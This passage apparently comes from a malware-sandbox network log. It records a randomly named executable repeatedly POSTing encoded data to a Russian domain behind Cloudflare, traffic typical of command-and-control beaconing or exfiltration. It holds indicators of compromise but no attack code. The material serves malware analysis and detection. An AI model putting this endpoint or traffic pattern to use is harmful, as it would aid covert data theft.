                                                                                                                                CF-RAY: 8fb55d6fe8c5422d-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=10367&min_rtt=1670&rtt_var=18021&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=20490&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a
                                                                                                                                Data Ascii: 40VX[
                                                                                                                                Jan 1, 2025 21:47:32.218118906 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                7 | 192.168.2.4 | 49746 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:31.658973932 CET347OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 155636
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:32.112818003 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:33.294301033 CET809INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:33 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wm0kaSzluewWWz7JtC8%2FIHLJC7wdlzvvzWAIxw8ndd73nREUqfSl4%2F6AKfiV1f1hb7KvshMj%2B9L2Ho7nVqKMztg3ihvS329cWN09rRB8SjBa9kU5ug096qASA1EWYl0ltNwsREvZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d716e3c7cb2-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3694&min_rtt=1783&rtt_var=4491&sent=56&recv=162&lost=0&retrans=0&sent_bytes=25&recv_bytes=155983&delivery_rate=85520&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                8 | 192.168.2.4 | 49747 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:32.375997066 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:47:32.735125065 CET | 1072 | OUT | Data Raw: 54 53 5b 52 53 43 59 54 5d 56 5b 57 54 5b 51 59 58 54 58 5a 5b 56 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TS[RSCYT]V[WT[QYXTXZ[VWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!0Y"2-"X;'=#";++4!5 R0.)6=E+_&!^&%X*
Jan 1, 2025 21:47:32.850366116 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:33.187572956 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:33 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fJgPNDPUQVo8vsAsYPqTZTIlo7llq4RGGW95qcnNVq73r8JqFBuLlAEMwxGdtMhqEMQo5yiHKqswFIHKiP3WfqQqsUQj3INMCBQ0gSpk3mHw2%2F92gNHc9TWfOOb9w%2BEJE0%2Bz0JWU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d75fda572b7-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8014&min_rtt=1840&rtt_var=13038&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=28497&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49749 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:33.409024000 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:33.764704943 CET | 1072 | OUT | Data Raw: 51 56 5b 50 53 46 59 5e 5d 56 5b 57 54 58 51 59 58 5c 58 59 5b 56 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QV[PSFY^]V[WTXQYX\XY[VWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[![$;#"!>?$.0Y#;<*$;5 U0 :(56([1:!^&%X*7
Jan 1, 2025 21:47:33.863409996 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:34.236210108 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:34 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LcYVCwDvly1uUkhHL9voo2FJ9j%2B6%2BdmcyVHI5Q69wjnKJ3SMR4TXwULCFvAqS1qC3W95adXztBK29eThFSoU7Z%2BdDj4PhcNV5Yw0o6a2Lgz0A5sJ6UoZYWKTZNkOJLO2%2BYeuByhn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d7c5d7e434f-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3934&min_rtt=1588&rtt_var=5287&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=71723&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49751 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:33.604304075 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:33.952194929 CET | 1788 | OUT | Data Raw: 51 55 5e 50 56 40 5c 53 5d 56 5b 57 54 5f 51 5d 58 53 58 5d 5b 56 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QU^PV@\S]V[WT_Q]XSX][VWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["32X"2X =?^'.;6 ('64T'0.*%5B?4X%!^&%X*+
Jan 1, 2025 21:47:34.066788912 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:34.327893019 CET | 959 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:34 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=De3J1ELG093F9c156s37RNIKb6%2BzPsYVy7Q9eheeNaset%2BHSQ21l8QvFF%2BpZJV1EQKs3pqIGAA2Q%2FNNI9oqC1s%2F%2Byeud9p3%2BnNQf5XcDGuyMnWOBXdjpoUMuxBLgyc0D6%2B62RxOt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d7d9b1b425c-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8085&min_rtt=1617&rtt_var=13542&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=27360&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 56 3f 25 27 52 37 31 2e 0f 29 06 3b 58 25 31 26 12 32 33 21 09 3c 3b 30 07 3f 2c 2b 0c 26 02 30 16 27 5c 2a 0b 3f 0b 27 03 2a 36 20 5c 05 1b 3a 03 33 07 01 1c 26 5d 22 0a 28 33 28 15 23 11 2e 12 3e 55 2c 50 37 38 2d 12 25 28 00 0d 26 2a 26 56 29 3f 2f 1a 2a 56 23 50 26 17 2a 51 0f 16 38 56 2a 33 31 04 29 3c 05 07 27 0f 20 12 22 1b 2d 56 31 02 37 55 30 5c 36 10 3f 3d 2b 50 22 0d 2c 0e 31 2c 22 5a 25 3e 0d 55 2e 00 26 5e 20 01 22 53 02 3f 55 56 0d 0a
                                                                                                                                Data Ascii: 98!V?%'R71.);X%1&23!<;0?,+&0'\*?'*6 \:3&]"(3(#.>U,P78-%(&*&V)?/*V#P&*Q8V*31)<' "-V17U0\6?=+P",1,"Z%>U.&^ "S?UV
Jan 1, 2025 21:47:34.418241978 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49752 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:34.365550995 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:47:34.717814922 CET | 1072 | OUT | Data Raw: 54 51 5b 53 56 40 59 55 5d 56 5b 57 54 5b 51 59 58 57 58 5b 5b 55 57 43 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TQ[SV@YU]V[WT[QYXWX[[UWCVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[![02/Z -50>8Y#;4<#T64U$.])!+>7%:!^&%X*
Jan 1, 2025 21:47:34.829441071 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:35.110486984 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:35 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jT2sUDAfuLE2o7DQa8xMhouV%2BbEJVVI%2BnGmEVbPLk6IGhLEscJT7Ej5LvfEnKmTfvzMsmDNktNHK0qzvAJvvcbwUME9oBmrl7I71NHv%2BybAxdcn19DcKb6diY1pceIGMiswyUfrj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d825ce70f46-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4594&min_rtt=1618&rtt_var=6560&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=57405&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49753 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:35.244880915 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:47:35.630832911 CET | 1060 | OUT | Data Raw: 54 55 5e 57 56 40 5c 52 5d 56 5b 57 54 5c 51 5b 58 57 58 5a 5b 53 57 43 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TU^WV@\R]V[WT\Q[XWXZ[SWCVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Z$!##"1]!X+$-058(;!&8U'3)*61<.2*!^&%X*/
Jan 1, 2025 21:47:35.708853006 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:35.924716949 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:35.989300966 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:35 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LU3KwK9mYk%2BApxkq29cNnDLe6WSWiqtxzhzY1yBKThgZhLjYnHlGbLV9WkBTbM2%2Ff5%2BbWUEwqmfgC%2FdcLgJojX4MpAisHUf%2BMdSN8Wssm38iOb4tJKRSaGT0TBQCIP7JTQWMrhlF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d87ddb18c8f-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4027&min_rtt=1807&rtt_var=5118&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1381&delivery_rate=74611&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49754 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:36.228956938 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:47:36.577851057 CET | 1072 | OUT | Data Raw: 51 56 5e 52 53 46 59 50 5d 56 5b 57 54 59 51 59 58 51 58 5d 5b 54 57 48 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QV^RSFYP]V[WTYQYXQX][TWHVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!_'/#1-]6$3Z#8+T($6$V%3:]*62<8'*!^&%X*3
Jan 1, 2025 21:47:36.677045107 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:36.943042994 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:36 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H5nDKZ5sU2p5pq0zsXBHZCBJ%2BrcXAnE2KcZJUqE37%2B9MbZtIz3SbKyfWmJCNgoO3jZDMsp2ZsXyInEXYNTTyLWV3iVCDIgp%2F3X1cUSocndywhhUcCxSmpCtNt2GWER0r8AJZC5ST"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d8ded5c4316-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4102&min_rtt=2025&rtt_var=4913&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=78321&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49755 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:37.385642052 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:37.840023994 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:38.100986958 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:38 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8%2FAVLXzeXZGglF3l21dUvLRT5kiIwhkc2%2BM%2BA9s9UZCLDa90BLIHq9NXchAWFZLXC4coyOWIxjX1H8Scplztz%2BOLKloKp2IccXq7xGiqhSijFQHGYnEedDbT1E4BPvDyKsIVnSNo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d9539a743c1-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3659&min_rtt=2388&rtt_var=3438&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=116251&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49756 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:39.087028980 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49757 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:39.427089930 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:39.898937941 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:40.170876026 CET | 957 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:40 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CY%2Brtv3l%2BGFcHVtZA4h9W7E4T4IKuRvFAdhtoztQ0uMfMTsyntgZUUM2v5ed%2FJtV8PlgbvxumT6kSPJXfV6l3PRXGm8Dm6GsLpGay7IdjDY8bHP2sPvn%2BJlnKApIcxJ9SC%2B1kfrS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55da20fcd5e72-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3902&min_rtt=1606&rtt_var=5195&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=73084&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49758 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:39.551760912 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
